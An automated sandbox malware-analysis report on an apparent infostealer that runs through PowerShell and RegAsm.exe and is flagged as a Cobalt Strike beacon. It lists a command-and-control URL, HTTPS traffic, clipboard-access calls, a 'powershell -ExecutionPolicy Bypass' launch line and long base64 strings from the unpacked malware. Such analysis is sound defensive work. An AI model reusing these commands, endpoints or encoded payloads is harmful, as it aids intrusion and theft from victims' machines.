Source: powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/B
Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/S
Source: RegAsm.exe, 00000008.00000002.1937052782.000000000110B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: RegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apiP
Source: RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat:443/api
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat:443/apiuser
Source: powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1737453939.000000000530C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=
Source: powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_004329C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_004329C0

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -			Jump to behavior

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

.NET source code contains very large strings

Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Sap.cs	Long String: Length: 18812
Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Sap.cs	Long String: Length: 18812
Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Sap.cs	Long String: Length: 18812

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00408850	8_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00423860	8_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004218A0	8_2_004218A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042DA53	8_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043ECA0	8_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00437DF0	8_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004096C1	8_2_004096C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004266D0	8_2_004266D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043F720	8_2_0043F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00415799	8_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00438810	8_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041682D	8_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004288CB	8_2_004288CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D880	8_2_0043D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00430940	8_2_00430940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00403970	8_2_00403970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00420939	8_2_00420939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004179C1	8_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004231C2	8_2_004231C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004241C0	8_2_004241C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043B1D0	8_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004291DD	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D980	8_2_0043D980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00405990	8_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00422190	8_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D997	8_2_0043D997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D999	8_2_0043D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004091B0	8_2_004091B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042CA49	8_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00416263	8_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040EA10	8_2_0040EA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00415220	8_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042CAD0	8_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004252DD	8_2_004252DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041B2E0	8_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00406280	8_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043DA80	8_2_0043DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041E290	8_2_0041E290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041CB40	8_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D34D	8_2_0043D34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00426B50	8_2_00426B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043DB60	8_2_0043DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00436B08	8_2_00436B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042830D	8_2_0042830D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042CB11	8_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00404320	8_2_00404320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042CB22	8_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00425327	8_2_00425327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00408330	8_2_00408330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043F330	8_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042A33F	8_2_0042A33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040DBD9	8_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00424380	8_2_00424380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041FC75	8_2_0041FC75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041DC00	8_2_0041DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00429C2B	8_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004291DD	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004074F0	8_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040ACF0	8_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041148F	8_2_0041148F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042AC90	8_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040CD46	8_2_0040CD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00437500	8_2_00437500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00422510	8_2_00422510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00417DEE	8_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00409580	8_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041759F	8_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00425E70	8_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00436E74	8_2_00436E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00427603	8_2_00427603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00425E30	8_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004286C0	8_2_004286C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043AEC0	8_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004236E2	8_2_004236E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00405EE0	8_2_00405EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041DE80	8_2_0041DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00402F50	8_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00420F50	8_2_00420F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00438F59	8_2_00438F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00406710	8_2_00406710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00423F20	8_2_00423F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00419F30	8_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004197C2	8_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042DFE9	8_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040A780	8_2_0040A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00411F90	8_2_00411F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00418792	8_2_00418792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043EFB0	8_2_0043EFB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00414400 appears 65 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 5.2.powershell.exe.51b66dc.2.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 5.2.powershell.exe.86d0000.3.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWm